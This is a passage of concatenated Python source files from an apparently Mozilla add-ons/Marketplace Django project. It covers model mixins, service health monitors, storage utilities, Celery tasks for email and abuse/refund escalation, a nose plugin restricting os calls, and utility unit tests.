using=self._db, *args, **kwargs)
class _NoChangeInstance(object):
"""A proxy for object instances to make safe operations within an
OnChangeMixin.on_change() callback.
"""
def __init__(self, instance):
self.__instance = instance
def __repr__(self):
return u'<%s for %r>' % (self.__class__.__name__, self.__instance)
def __getattr__(self, attr):
return getattr(self.__instance, attr)
def __setattr__(self, attr, val):
if attr.endswith('__instance'):
# _NoChangeInstance__instance
self.__dict__[attr] = val
else:
setattr(self.__instance, attr, val)
def save(self, *args, **kw):
kw['_signal'] = False
return self.__instance.save(*args, **kw)
def update(self, *args, **kw):
kw['_signal'] = False
return self.__instance.update(*args, **kw)
_on_change_callbacks = {}
# @TODO(Kumar) liberate: move OnChangeMixin Model mixin to nuggets
class OnChangeMixin(object):
"""Mixin for a Model that allows you to observe attribute changes.
Register change observers with::
class YourModel(amo.models.OnChangeMixin,
amo.models.ModelBase):
# ...
pass
YourModel.on_change(callback)
"""
def __init__(self, *args, **kw):
super(OnChangeMixin, self).__init__(*args, **kw)
self._initial_attr = dict(self.__dict__)
@classmethod
def on_change(cls, callback):
"""Register a function to call on save or update to respond to changes.
For example::
def watch_status(old_attr={}, new_attr={},
instance=None, sender=None, **kw):
if old_attr.get('status') != new_attr.get('status'):
# ...
new_instance.save(_signal=False)
TheModel.on_change(watch_status)
.. note::
Any call to instance.save() or instance.update() within a callback
will not trigger any change handlers.
.. note::
Duplicates based on function.__name__ are ignored for a given
class.
"""
existing = _on_change_callbacks.get(cls, [])
if callback.__name__ in [e.__name__ for e in existing]:
return callback
_on_change_callbacks.setdefault(cls, []).append(callback)
return callback
def _send_changes(self, old_attr, new_attr_kw):
new_attr = old_attr.copy()
new_attr.update(new_attr_kw)
for cb in _on_change_callbacks[self.__class__]:
cb(old_attr=old_attr, new_attr=new_attr,
instance=_NoChangeInstance(self), sender=self.__class__)
def save(self, *args, **kw):
"""
Save changes to the model instance.
If _signal=False is in `kw` the on_change() callbacks won't be called.
"""
signal = kw.pop('_signal', True)
result = super(OnChangeMixin, self).save(*args, **kw)
if signal and self.__class__ in _on_change_callbacks:
self._send_changes(self._initial_attr, dict(self.__dict__))
return result
def update(self, **kw):
"""
Shortcut for doing an UPDATE on this object.
If _signal=False is in ``kw`` the post_save signal won't be sent.
"""
signal = kw.pop('_signal', True)
old_attr = dict(self.__dict__)
result = super(OnChangeMixin, self).update(_signal=signal, **kw)
if signal and self.__class__ in _on_change_callbacks:
self._send_changes(old_attr, kw)
return result
class ModelBase(caching.base.CachingMixin, models.Model):
"""
Base class for AMO models to abstract some common features.
* Adds automatic created and modified fields to the model.
* Fetches all translations in one subsequent query during initialization.
"""
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
objects = ManagerBase()
class Meta:
abstract = True
get_latest_by = 'created'
def get_absolute_url(self, *args, **kwargs):
return self.get_url_path(*args, **kwargs)
@classmethod
def _cache_key(cls, pk, db):
"""
Custom django-cache-machine cache key implementation that avoids having
the real db in the key, since we are only using master-slaves we don't
need it and it avoids invalidation bugs with FETCH_BY_ID.
"""
key_parts = ('o', cls._meta, pk, 'default')
return ':'.join(map(encoding.smart_unicode, key_parts))
def reload(self):
"""Reloads the instance from the database."""
from_db = self.__class__.objects.get(id=self.id)
for field in self.__class__._meta.fields:
try:
setattr(self, field.name, getattr(from_db, field.name))
except models.ObjectDoesNotExist:
# reload() can be called before cleaning up an object of stale
# related fields, when we do soft-deletion for instance. Avoid
# failing because of that.
pass
return self
def update(self, **kw):
"""
Shortcut for doing an UPDATE on this object.
If _signal=False is in ``kw`` the post_save signal won't be sent.
"""
signal = kw.pop('_signal', True)
cls = self.__class__
for k, v in kw.items():
setattr(self, k, v)
if signal:
# Detect any attribute changes during pre_save and add those to the
# update kwargs.
attrs = dict(self.__dict__)
models.signals.pre_save.send(sender=cls, instance=self)
for k, v in self.__dict__.items():
if attrs[k] != v:
kw[k] = v
setattr(self, k, v)
cls.objects.filter(pk=self.pk).update(**kw)
if signal:
models.signals.post_save.send(sender=cls, instance=self,
created=False)
def manual_order(qs, pks, pk_name='id'):
"""
Given a query set and a list of primary keys, return a set of objects from
the query set in that exact order.
"""
if not pks:
return qs.none()
return qs.filter(id__in=pks).extra(
select={'_manual': 'FIELD(%s, %s)'
% (pk_name, ','.join(map(str, pks)))},
order_by=['_manual'])
class BlobField(models.Field):
"""MySQL blob column.
This is for using AES_ENCYPT() to store values.
It could maybe turn into a fancy transparent encypt/decrypt field
like http://djangosnippets.org/snippets/2489/
"""
description = "blob"
def db_type(self, **kw):
return 'blob'
class SlugField(models.SlugField):
"""
Django 1.6's SlugField rejects non-ASCII slugs. This field just
keeps the old behaviour of not checking contents.
"""
default_validators = []
class FakeEmail(ModelBase):
message = models.TextField()
class Meta:
db_table = 'fake_email'
########NEW FILE########
__FILENAME__ = monitors
import os
import socket
import StringIO
import tempfile
import time
import traceback
from django.conf import settings
import commonware.log
import elasticutils
import requests
from cache_nuggets.lib import memoize
from PIL import Image
from applications.management.commands import dump_apps
from lib.crypto import packaged, receipt
from lib.crypto.packaged import SigningError as PackageSigningError
from lib.crypto.receipt import SigningError
from lib.pay_server import client
monitor_log = commonware.log.getLogger('z.monitor')
def memcache():
memcache = getattr(settings, 'CACHES', {}).get('default')
memcache_results = []
status = ''
if memcache and 'memcache' in memcache['BACKEND']:
hosts = memcache['LOCATION']
using_twemproxy = False
if not isinstance(hosts, (tuple, list)):
hosts = [hosts]
for host in hosts:
ip, port = host.split(':')
if ip == '127.0.0.1':
using_twemproxy = True
try:
s = socket.socket()
s.connect((ip, int(port)))
except Exception, e:
result = False
status = 'Failed to connect to memcached (%s): %s' % (host, e)
monitor_log.critical(status)
else:
result = True
finally:
s.close()
memcache_results.append((ip, port, result))
if not using_twemproxy and len(memcache_results) < 2:
status = ('2+ memcache servers are required.'
'%s available') % len(memcache_results)
monitor_log.warning(status)
if not memcache_results:
status = 'Memcache is not configured'
monitor_log.info(status)
return status, memcache_results
def libraries():
# Check Libraries and versions
libraries_results = []
status = ''
try:
Image.new('RGB', (16, 16)).save(StringIO.StringIO(), 'JPEG')
libraries_results.append(('PIL+JPEG', True, 'Got it!'))
except Exception, e:
msg = "Failed to create a jpeg image: %s" % e
libraries_results.append(('PIL+JPEG', False, msg))
try:
import M2Crypto # NOQA
libraries_results.append(('M2Crypto', True, 'Got it!'))
except ImportError:
libraries_results.append(('M2Crypto', False, 'Failed to import'))
if settings.SPIDERMONKEY:
if os.access(settings.SPIDERMONKEY, os.R_OK):
libraries_results.append(('Spidermonkey is ready!', True, None))
# TODO: see if it works?
else:
msg = "You said spidermonkey was at (%s)" % settings.SPIDERMONKEY
libraries_results.append(('Spidermonkey', False, msg))
else:
msg = "Please set SPIDERMONKEY in your settings file."
libraries_results.append(('Spidermonkey', False, msg))
missing_libs = [l for l, s, m in libraries_results if not s]
if missing_libs:
status = 'missing libs: %s' % ",".join(missing_libs)
return status, libraries_results
def elastic():
elastic_results = None
status = ''
try:
health = elasticutils.get_es().health()
if health['status'] == 'red':
status = 'ES is red'
elastic_results = health
except Exception:
monitor_log.exception('Failed to communicate with ES')
elastic_results = {'error': traceback.format_exc()}
status = 'traceback'
return status, elastic_results
def path():
# Check file paths / permissions
rw = (settings.TMP_PATH,
settings.NETAPP_STORAGE,
settings.UPLOADS_PATH,
settings.ADDONS_PATH,
settings.MIRROR_STAGE_PATH,
settings.GUARDED_ADDONS_PATH,
settings.ADDON_ICONS_PATH,
settings.COLLECTIONS_ICON_PATH,
settings.PREVIEWS_PATH,
settings.USERPICS_PATH,
settings.REVIEWER_ATTACHMENTS_PATH,
dump_apps.Command.JSON_PATH,)
r = [os.path.join(settings.ROOT, 'locale'),
# The deploy process will want write access to this.
# We do not want Django to have write access though.
settings.PROD_DETAILS_DIR]
filepaths = [(path, os.R_OK | os.W_OK, "We want read + write")
for path in rw]
filepaths += [(path, os.R_OK, "We want read") for path in r]
filepath_results = []
filepath_status = True
for path, perms, notes in filepaths:
path_exists = os.path.exists(path)
path_perms = os.access(path, perms)
filepath_status = filepath_status and path_exists and path_perms
filepath_results.append((path, path_exists, path_perms, notes))
key_exists = os.path.exists(settings.WEBAPPS_RECEIPT_KEY)
key_perms = os.access(settings.WEBAPPS_RECEIPT_KEY, os.R_OK)
filepath_status = filepath_status and key_exists and key_perms
filepath_results.append(('settings.WEBAPPS_RECEIPT_KEY',
key_exists, key_perms, 'We want read'))
status = filepath_status
status = ''
if not filepath_status:
status = 'check main status page for broken perms'
return status, filepath_results
def redis():
# Check Redis
redis_results = [None, 'REDIS_BACKENDS is not set']
status = 'REDIS_BACKENDS is not set'
if getattr(settings, 'REDIS_BACKENDS', False):
import redisutils
status = []
redis_results = {}
for alias, redis in redisutils.connections.iteritems():
try:
redis_results[alias] = redis.info()
except Exception, e:
redis_results[alias] = None
status.append('Failed to chat with redis:%s' % alias)
monitor_log.critical('Failed to chat with redis: (%s)' % e)
status = ','.join(status)
return status, redis_results
# The signer check actually asks the signing server to sign something. Do this
# once per nagios check, once per web head might be a bit much. The memoize
# slows it down a bit, by caching the result for 15 seconds.
@memoize('monitors-signer', time=15)
def receipt_signer():
destination = getattr(settings, 'SIGNING_SERVER', None)
if not destination:
return '', 'Signer is not configured.'
# Just send some test data into the signer.
now = int(time.time())
not_valid = (settings.SITE_URL + '/not-valid')
data = {'detail': not_valid, 'exp': now + 3600, 'iat': now,
'iss': settings.SITE_URL,
'product': {'storedata': 'id=1', 'url': u'http://not-valid.com'},
'nbf': now, 'typ': 'purchase-receipt',
'reissue': not_valid,
'user': {'type': 'directed-identifier',
'value': u'something-not-valid'},
'verify': not_valid
}
try:
result = receipt.sign(data)
except SigningError as err:
msg = 'Error on signing (%s): %s' % (destination, err)
return msg, msg
try:
cert, rest = receipt.crack(result)
except Exception as err:
msg = 'Error on cracking receipt (%s): %s' % (destination, err)
return msg, msg
# Check that the certs used to sign the receipts are not about to expire.
limit = now + (60 * 60 * 24) # One day.
if cert['exp'] < limit:
msg = 'Cert will expire soon (%s)' % destination
return msg, msg
cert_err_msg = 'Error on checking public cert (%s): %s'
location = cert['iss']
try:
resp = requests.get(location, timeout=5, stream=False)
except Exception as err:
msg = cert_err_msg % (location, err)
return msg, msg
if not resp.ok:
msg = cert_err_msg % (location, resp.reason)
return msg, msg
cert_json = resp.json()
if not cert_json or not 'jwk' in cert_json:
msg = cert_err_msg % (location, 'Not valid JSON/JWK')
return msg, msg
return '', 'Signer working and up to date'
# Like the receipt signer above this asks the packaged app signing
# service to sign one for us.
@memoize('monitors-package-signer', time=60)
def package_signer():
destination = getattr(settings, 'SIGNED_APPS_SERVER', None)
if not destination:
return '', 'Signer is not configured.'
app_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'nagios_check_packaged_app.zip')
signed_path = tempfile.mktemp()
try:
packaged.sign_app(app_path, signed_path, None, False)
return '', 'Package signer working'
except PackageSigningError, e:
msg = 'Error on package signing (%s): %s' % (destination, e)
return msg, msg
finally:
os.unlink(signed_path)
# Not called settings to avoid conflict with django.conf.settings.
def settings_check():
required = ['APP_PURCHASE_KEY', 'APP_PURCHASE_TYP', 'APP_PURCHASE_AUD',
'APP_PURCHASE_SECRET']
for key in required:
if not getattr(settings, key):
msg = 'Missing required value %s' % key
return msg, msg
return '', 'Required settings ok'
def solitude():
try:
res = client.api.services.request.get()
except Exception as err:
return repr(err), repr(err)
auth = res.get('authenticated', None)
if auth != 'marketplace':
msg = 'Solitude authenticated as: %s' % auth
return msg, msg
return '', 'Solitude authentication ok'
########NEW FILE########
__FILENAME__ = pyquery_wrapper
"""
If libxml2 finds a <noscript> element in <head>, it appears to create a <body>
block right there and drop our real <body>, which has nice attributes we'd like
to see. So we'll regex out all those nasty <noscript>s and pretend everything
is just right.
The libxml2 bug is https://bugzilla.gnome.org/show_bug.cgi?id=615785.
"""
import re
import pyquery
# Yes, we're munging HTML with a regex. Deal with it.
noscript_re = re.compile('<noscript>.*?</noscript>')
def remove_noscript_from_head(html):
head_end = html.find('</head>')
new_head = noscript_re.sub('', html[:head_end])
return new_head + html[head_end:]
class PyQuery(pyquery.PyQuery):
def __init__(self, *args, **kwargs):
if (args and isinstance(args[0], basestring) and
not args[0].startswith('http')):
args = (remove_noscript_from_head(args[0]),) + args[1:]
super(PyQuery, self).__init__(*args, **kwargs)
########NEW FILE########
__FILENAME__ = runner
from django.conf import settings
from django.db.models import loading
from test_utils.runner import RadicalTestSuiteRunner
class RadicalTestSuiteRunnerWithExtraApps(RadicalTestSuiteRunner):
def setup_test_environment(self, **kwargs):
rval = super(RadicalTestSuiteRunnerWithExtraApps,
self).setup_test_environment(**kwargs)
extra_apps = getattr(settings, 'TEST_INSTALLED_APPS')
if extra_apps:
installed_apps = getattr(settings, 'INSTALLED_APPS')
setattr(settings, 'INSTALLED_APPS', installed_apps + extra_apps)
loading.cache.loaded = False
return rval
########NEW FILE########
__FILENAME__ = signals
import contextlib
from django import http
from django.conf import settings
from django.db import models
from . import urlresolvers
def flush_front_end_cache(sender, instance, **kwargs):
from . import tasks
furls = getattr(instance, 'flush_urls', None)
urls = furls() if hasattr(furls, '__call__') else furls
if urls:
tasks.flush_front_end_cache_urls.apply_async(args=[urls])
def _connect():
models.signals.post_save.connect(flush_front_end_cache)
models.signals.post_delete.connect(flush_front_end_cache)
def _disconnect():
models.signals.post_save.disconnect(flush_front_end_cache)
models.signals.post_delete.disconnect(flush_front_end_cache)
@contextlib.contextmanager
def hera_disabled():
_disconnect()
try:
yield
finally:
_connect()
## Hook up test signals here, for lack of a better spot.
def clean_url_prefixes(sender, **kwargs):
"""Wipe the URL prefixer(s) after each test."""
urlresolvers.clean_url_prefixes()
def default_prefixer(sender, **kwargs):
"""Make sure each test starts with a default URL prefixer."""
request = http.HttpRequest()
request.META['SCRIPT_NAME'] = ''
prefixer = urlresolvers.Prefixer(request)
prefixer.app = settings.DEFAULT_APP
prefixer.locale = settings.LANGUAGE_CODE
urlresolvers.set_url_prefix(prefixer)
# Register Django signals this app listens to.
try:
import test_utils.signals
except ImportError:
pass
else:
# Clean up URL prefix cache when a new test is invoked.
test_utils.signals.pre_setup.connect(default_prefixer)
test_utils.signals.post_teardown.connect(clean_url_prefixes)
########NEW FILE########
__FILENAME__ = storage_utils
"""
Utilities for working with the Django Storage API.
A lot of these methods assume the use of a storage backend that does not
require leading directories to exist. The default Django file system storage
*will* sometimes require leading directories to exist.
"""
from django.core.files.storage import default_storage
from django.utils.encoding import smart_str
DEFAULT_CHUNK_SIZE = 64 * 2 ** 10 # 64kB
def walk_storage(path, topdown=True, onerror=None, followlinks=False,
storage=default_storage):
"""
Generate the file names in a stored directory tree by walking the tree
top-down.
For each directory in the tree rooted at the directory top (including top
itself), it yields a 3-tuple (dirpath, dirnames, filenames).
This is intended for use with an implementation of the Django storage API.
You can specify something other than the default storage instance with
the storage keyword argument.
"""
if not topdown:
raise NotImplementedError
if onerror:
raise NotImplementedError
roots = [path]
while len(roots):
new_roots = []
for root in roots:
dirs, files = storage.listdir(root)
files = [smart_str(f) for f in files]
dirs = [smart_str(d) for d in dirs]
yield root, dirs, files
for dn in dirs:
new_roots.append('%s/%s' % (root, dn))
roots[:] = new_roots
def copy_stored_file(src_path, dest_path, storage=default_storage,
chunk_size=DEFAULT_CHUNK_SIZE):
"""
Copy one storage path to another storage path.
Each path will be managed by the same storage implementation.
"""
if src_path == dest_path:
return
with storage.open(src_path, 'rb') as src:
with storage.open(dest_path, 'wb') as dest:
done = False
while not done:
chunk = src.read(chunk_size)
if chunk != '':
dest.write(chunk)
else:
done = True
def move_stored_file(src_path, dest_path, storage=default_storage,
chunk_size=DEFAULT_CHUNK_SIZE):
"""
Move a storage path to another storage path.
The source file will be copied to the new path then deleted.
This attempts to be compatible with a wide range of storage backends
rather than attempt to be optimized for each individual one.
"""
copy_stored_file(src_path, dest_path, storage=storage,
chunk_size=chunk_size)
storage.delete(src_path)
def rm_stored_dir(dir_path, storage=default_storage):
"""
Removes a stored directory and all files stored beneath that path.
"""
empty_dirs = []
# Delete all files first then all empty directories.
for root, dirs, files in walk_storage(dir_path):
for fn in files:
storage.delete('%s/%s' % (root, fn))
empty_dirs.insert(0, root)
empty_dirs.append(dir_path)
for dn in empty_dirs:
storage.delete(dn)
########NEW FILE########
__FILENAME__ = tasks
import datetime
from django.conf import settings
from django.core.mail import EmailMessage, EmailMultiAlternatives
import commonware.log
import phpserialize
from celeryutils import task
from hera.contrib.django_utils import flush_urls
import amo
from abuse.models import AbuseReport
from addons.models import Addon
from amo.decorators import set_task_user
from amo.utils import get_email_backend
from devhub.models import ActivityLog, AppLog
from editors.models import EscalationQueue, EventLog
from reviews.models import Review
from mkt.prices.models import Refund
log = commonware.log.getLogger('z.task')
@task
def send_email(recipient, subject, message, from_email=None,
html_message=None, attachments=None, real_email=False,
cc=None, headers=None, fail_silently=False, async=False,
max_retries=None, **kwargs):
backend = EmailMultiAlternatives if html_message else EmailMessage
connection = get_email_backend(real_email)
result = backend(subject, message,
from_email, recipient, cc=cc, connection=connection,
headers=headers, attachments=attachments)
if html_message:
result.attach_alternative(html_message, 'text/html')
try:
result.send(fail_silently=False)
return True
except Exception as e:
log.error('send_mail failed with error: %s' % e)
if async:
return send_email.retry(exc=e, max_retries=max_retries)
elif not fail_silently:
raise
else:
return False
@task
def flush_front_end_cache_urls(urls, **kw):
"""Accepts a list of urls which will be sent through Hera to the front end
cache. This does no checking for success or failure or whether the URLs
were in the cache to begin with."""
if not urls:
return
log.info(u"Flushing %d URLs from front end cache: (%s)" % (len(urls),
urls))
# Zeus is only interested in complete URLs. We can't just pass a
# prefix to Hera because some URLs will be on SAMO.
for index, url in enumerate(urls):
if not url.startswith('http'):
if '/api/' in url:
urls[index] = u"%s%s" % (settings.SERVICES_URL, url)
else:
urls[index] = u"%s%s" % (settings.SITE_URL, url)
flush_urls(urls)
@task
def set_modified_on_object(obj, **kw):
"""Sets modified on one object at a time."""
try:
log.info('Setting modified on object: %s, %s' %
(obj.__class__.__name__, obj.pk))
obj.update(modified=datetime.datetime.now(), **kw)
except Exception, e:
log.error('Failed to set modified on: %s, %s - %s' %
(obj.__class__.__name__, obj.pk, e))
@task
def delete_logs(items, **kw):
log.info('[%s@%s] Deleting logs' % (len(items), delete_logs.rate_limit))
ActivityLog.objects.filter(pk__in=items).exclude(
action__in=amo.LOG_KEEP).delete()
@task
def delete_incomplete_addons(items, **kw):
log.info('[%s@%s] Deleting incomplete add-ons' %
(len(items), delete_incomplete_addons.rate_limit))
for addon in Addon.objects.filter(
highest_status=0, status=0, pk__in=items):
try:
addon.delete('Deleted for incompleteness')
except Exception as e:
log.error("Couldn't delete add-on %s: %s" % (addon.id, e))
@task
def migrate_editor_eventlog(items, **kw):
log.info('[%s@%s] Migrating eventlog items' %
(len(items), migrate_editor_eventlog.rate_limit))
for item in EventLog.objects.filter(pk__in=items):
kw = dict(user=item.user, created=item.created)
if item.action == 'review_delete':
details = None
try:
details = phpserialize.loads(item.notes)
except ValueError:
pass
amo.log(amo.LOG.DELETE_REVIEW, item.changed_id, details=details,
**kw)
elif item.action == 'review_approve':
try:
r = Review.objects.get(pk=item.changed_id)
amo.log(amo.LOG.ADD_REVIEW, r, r.addon, **kw)
except Review.DoesNotExist:
log.warning("Couldn't find review for %d" % item.changed_id)
@task
@set_task_user
def find_abuse_escalations(addon_id, **kw):
weekago = datetime.date.today() - datetime.timedelta(days=7)
add_to_queue = True
for abuse in AbuseReport.recent_high_abuse_reports(1, weekago, addon_id):
if EscalationQueue.objects.filter(addon=abuse.addon).exists():
# App is already in the queue, no need to re-add it.
log.info(u'[addon:%s] High abuse reports, but already escalated' %
(abuse.addon,))
add_to_queue = False
# We have an abuse report... has it been detected and dealt with?
logs = (AppLog.objects.filter(
activity_log__action=amo.LOG.ESCALATED_HIGH_ABUSE.id,
addon=abuse.addon).order_by('-created'))
if logs:
abuse_since_log = AbuseReport.recent_high_abuse_reports(
1, logs[0].created, addon_id)
# If no abuse reports have happened since the last logged abuse
# report, do not add to queue.
if not abuse_since_log:
log.info(u'[addon:%s] High abuse reports, but none since last '
u'escalation' % abuse.addon)
continue
# If we haven't bailed out yet, escalate this app.
msg = u'High number of abuse reports detected'
if add_to_queue:
EscalationQueue.objects.create(addon=abuse.addon)
amo.log(amo.LOG.ESCALATED_HIGH_ABUSE, abuse.addon,
abuse.addon.current_version, details={'comments': msg})
log.info(u'[addon:%s] %s' % (abuse.addon, msg))
@task
@set_task_user
def find_refund_escalations(addon_id, **kw):
try:
addon = Addon.objects.get(pk=addon_id)
except Addon.DoesNotExist:
log.info(u'[addon:%s] Task called but no addon found.' % addon_id)
return
refund_threshold = 0.05
weekago = datetime.date.today() - datetime.timedelta(days=7)
add_to_queue = True
ratio = Refund.recent_refund_ratio(addon.id, weekago)
if ratio > refund_threshold:
if EscalationQueue.objects.filter(addon=addon).exists():
# App is already in the queue, no need to re-add it.
log.info(u'[addon:%s] High refunds, but already escalated' % addon)
add_to_queue = False
# High refunds... has it been detected and dealt with already?
logs = (AppLog.objects.filter(
activity_log__action=amo.LOG.ESCALATED_HIGH_REFUNDS.id,
addon=addon).order_by('-created', '-id'))
if logs:
since_ratio = Refund.recent_refund_ratio(addon.id, logs[0].created)
# If not high enough ratio since the last logged, do not add to
# the queue.
if not since_ratio > refund_threshold:
log.info(u'[addon:%s] High refunds, but not enough since last '
u'escalation. Ratio: %.0f%%' % (addon,
since_ratio * 100))
return
# If we haven't bailed out yet, escalate this app.
msg = u'High number of refund requests (%.0f%%) detected.' % (
(ratio * 100),)
if add_to_queue:
EscalationQueue.objects.create(addon=addon)
amo.log(amo.LOG.ESCALATED_HIGH_REFUNDS, addon,
addon.current_version, details={'comments': msg})
log.info(u'[addon:%s] %s' % (addon, msg))
########NEW FILE########
__FILENAME__ = models
from django.db import models
from amo import fields
class DecimalCharFieldModel(models.Model):
strict = fields.DecimalCharField(max_digits=10, decimal_places=2)
loose = fields.DecimalCharField(max_digits=10, decimal_places=2,
nullify_invalid=True, null=True)
########NEW FILE########
__FILENAME__ = ospatch
"""
Nose plugin to restrict access to blacklisted os modules.
Activate by running nosetests --with-ospatch or like this in local settings:
NOSE_PLUGINS = [
'amo.tests.ospatch.OSPatch',
]
NOSE_ARGS = [
'--with-ospatch',
]
This was originally made to
help identify code that needed to be ported to the Django storage API.
After breaking/fixing the tests, this command was also useful:
egrep '\bos\..*' -R apps/ | grep -v 'os.path' | grep -v 'link.os' | grep -v 'os.environ' | egrep -v 'os\.[A-Z]' | less
"""
import logging
import os
import re
from traceback import extract_stack
from nose.plugins import Plugin
log = logging.getLogger('nose.plugins.ospatch')
class OSRestricted(Exception):
pass
class OSPatch(Plugin):
name = 'ospatch'
score = -1 # load after all other plugins
def options(self, parser, env=os.environ):
super(OSPatch, self).options(parser, env=env)
self.parser = parser
def configure(self, options, conf):
super(OSPatch, self).configure(options, conf)
if not self.enabled:
return
self.cmd_options = options
self.config = conf
def begin(self):
log.info('Patching os!')
import amo
# e.g. /path/to/zamboni/apps
amo_path = os.path.abspath(os.path.join(
os.path.dirname(amo.__file__), '..'))
for name in dir(os):
if (name not in ('altsep',
'curdir',
'error',
'errno',
'extsep',
'getenv',
'environ',
'getcwd',
'getpid',
'linesep',
'lstat',
'name',
'pardir',
'path',
'pathsep',
'putenv',
'sep',
'setenv',
'strerror',
'stat',
'sys',
'uname',
'urandom',)
and not name.startswith('_')
and not name[0].isupper()):
setattr(os, name, _Patch(amo_path, getattr(os, name)))
class _Patch(object):
def __init__(self, amo_path, orig):
self.amo_path = amo_path
self.orig = orig
def __call__(self, *args, **kw):
allow_call = False
is_amo = False
for filename, lineno, fn, text in extract_stack():
file_fn = '%s:%s' % (filename, fn)
if os.path.abspath(filename).startswith(self.amo_path):
is_amo = True
if ('settings_test.py' in filename
# Ignore whitelisted lib usage.
or 'tempfile.py' in filename
or 'random.py' in filename
or '/PIL/' in filename
# Ignore storage API.
or 'django/core/files/storage.py:open' in file_fn
or 'django/core/files/storage.py:exists' in file_fn
or 'django/core/files/storage.py:listdir' in file_fn
or 'django/core/files/storage.py:path' in file_fn
or 'django/core/files/storage.py:size' in file_fn
or 'django/core/files/storage.py:url' in file_fn
or 'django/core/files/storage.py:save' in file_fn
or 'django/core/files/storage.py:delete' in file_fn
or 'amo/utils.py:path' in file_fn # storage API
# These need to operate on local files.
or 'amo/utils.py:rm_local_tmp_dir' in file_fn
or 'amo/utils.py:rm_local_tmp_file' in file_fn
or 'files/utils.py:extract_xpi' in file_fn
or 'payments/models.py:generate_private_key' in file_fn
# Ignore some test code.
or 'tests/test_views_edit.py:setup_image_status' in file_fn
or 'search/tests/__init__.py:setUp' in file_fn
or 'amo/tests/__init__.py:xpi_copy_over' in file_fn,
):
allow_call = True
# print filename, fn
if not is_amo:
# Only detect incorrect os usage in AMO.
allow_call = True
if allow_call:
return self.orig(*args, **kw)
raise OSRestricted('cannot call %s' % self.orig)
########NEW FILE########
__FILENAME__ = test_amo_utils
# -*- coding: utf-8 -*-
import os
import tempfile
import unittest
from django.conf import settings
from django.core.cache import cache
from django.core.validators import ValidationError
from django.utils import translation
import mock
from nose.tools import eq_, assert_raises, raises
from amo.utils import (cache_ns_key, escape_all, find_language,
LocalFileStorage, no_translation, resize_image,
rm_local_tmp_dir, slugify, slug_validator, to_language)
from product_details import product_details
from translations.models import Translation
u = u'Ελληνικά'
def test_slug_validator():
eq_(slug_validator(u.lower()), None)
eq_(slug_validator('-'.join([u.lower(), u.lower()])), None)
assert_raises(ValidationError, slug_validator, '234.add')
assert_raises(ValidationError, slug_validator, 'a a a')
assert_raises(ValidationError, slug_validator, 'tags/')
def test_slugify():
x = '-'.join([u, u])
y = ' - '.join([u, u])
def check(x, y):
eq_(slugify(x), y)
slug_validator(slugify(x))
s = [('xx x - "#$@ x', 'xx-x-x'),
(u'Bän...g (bang)', u'bäng-bang'),
(u, u.lower()),
(x, x.lower()),
(y, x.lower()),
(' a ', 'a'),
('tags/', 'tags'),
('holy_wars', 'holy_wars'),
# I don't really care what slugify returns. Just don't crash.
(u'x荿', u'x\u837f'),
(u'ϧ蒬蓣', u'\u03e7\u84ac\u84e3'),
(u'¿x', u'x'),
]
for val, expected in s:
yield check, val, expected
def test_resize_image():
# src and dst shouldn't be the same.
assert_raises(Exception, resize_image, 't', 't', 'z')
def test_resize_transparency():
src = os.path.join(settings.ROOT, 'apps', 'amo', 'tests',
'images', 'transparent.png')
dest = tempfile.mkstemp(dir=settings.TMP_PATH)[1]
expected = src.replace('.png', '-expected.png')
try:
resize_image(src, dest, (32, 32), remove_src=False, locally=True)
with open(dest) as dfh:
with open(expected) as efh:
assert dfh.read() == efh.read()
finally:
if os.path.exists(dest):
os.remove(dest)
def test_to_language():
tests = (('en-us', 'en-US'),
('en_US', 'en-US'),
('en_us', 'en-US'),
('FR', 'fr'),
('el', 'el'))
def check(a, b):
eq_(to_language(a), b)
for a, b in tests:
yield check, a, b
def test_find_language():
tests = (('en-us', 'en-US'),
('en_US', 'en-US'),
('en', 'en-US'),
('cy', 'cy'), # A hidden language.
('FR', 'fr'),
('es-ES', None), # We don't go from specific to generic.
('xxx', None))
def check(a, b):
eq_(find_language(a), b)
for a, b in tests:
yield check, a, b
def test_spotcheck():
"""Check a couple product-details files to make sure they're available."""
languages = product_details.languages
eq_(languages['el']['English'], 'Greek')
eq_(languages['el']['native'], u'Ελληνικά')
eq_(product_details.firefox_history_major_releases['1.0'], '2004-11-09')
def test_no_translation():
"""
`no_translation` provides a context where only the default
language is active.
"""
lang = translation.get_language()
translation.activate('pt-br')
with no_translation():
eq_(translation.get_language(), settings.LANGUAGE_CODE)
eq_(translation.get_language(), 'pt-br')
with no_translation('es'):
eq_(translation.get_language(), 'es')
eq_(translation.get_language(), 'pt-br')
translation.activate(lang)
class TestLocalFileStorage(unittest.TestCase):
def setUp(self):
self.tmp = tempfile.mkdtemp()
self.stor = LocalFileStorage()
def tearDown(self):
rm_local_tmp_dir(self.tmp)
def test_read_write(self):
fn = os.path.join(self.tmp, 'somefile.txt')
with self.stor.open(fn, 'w') as fd:
fd.write('stuff')
with self.stor.open(fn, 'r') as fd:
eq_(fd.read(), 'stuff')
def test_non_ascii_filename(self):
fn = os.path.join(self.tmp, u'Ivan Krsti\u0107.txt')
with self.stor.open(fn, 'w') as fd:
fd.write('stuff')
with self.stor.open(fn, 'r') as fd:
eq_(fd.read(), 'stuff')
def test_non_ascii_content(self):
fn = os.path.join(self.tmp, 'somefile.txt')
with self.stor.open(fn, 'w') as fd:
fd.write(u'Ivan Krsti\u0107.txt'.encode('utf8'))
with self.stor.open(fn, 'r') as fd:
eq_(fd.read().decode('utf8'), u'Ivan Krsti\u0107.txt')
def test_make_file_dirs(self):
dp = os.path.join(self.tmp, 'path', 'to')
self.stor.open(os.path.join(dp, 'file.txt'), 'w').close()
assert os.path.exists(self.stor.path(dp)), (
'Directory not created: %r' % dp)
def test_do_not_make_file_dirs_when_reading(self):
fpath = os.path.join(self.tmp, 'file.txt')
with open(fpath, 'w') as fp:
fp.write('content')
# Make sure this doesn't raise an exception.
self.stor.open(fpath, 'r').close()
def test_make_dirs_only_once(self):
dp = os.path.join(self.tmp, 'path', 'to')
with self.stor.open(os.path.join(dp, 'file.txt'), 'w') as fd:
fd.write('stuff')
# Make sure it doesn't try to make the dir twice
with self.stor.open(os.path.join(dp, 'file.txt'), 'w') as fd:
fd.write('stuff')
with self.stor.open(os.path.join(dp, 'file.txt'), 'r') as fd:
eq_(fd.read(), 'stuff')
def test_delete_empty_dir(self):
dp = os.path.join(self.tmp, 'path')
os.mkdir(dp)
self.stor.delete(dp)
eq_(os.path.exists(dp), False)
@raises(OSError)
def test_cannot_delete_non_empty_dir(self):
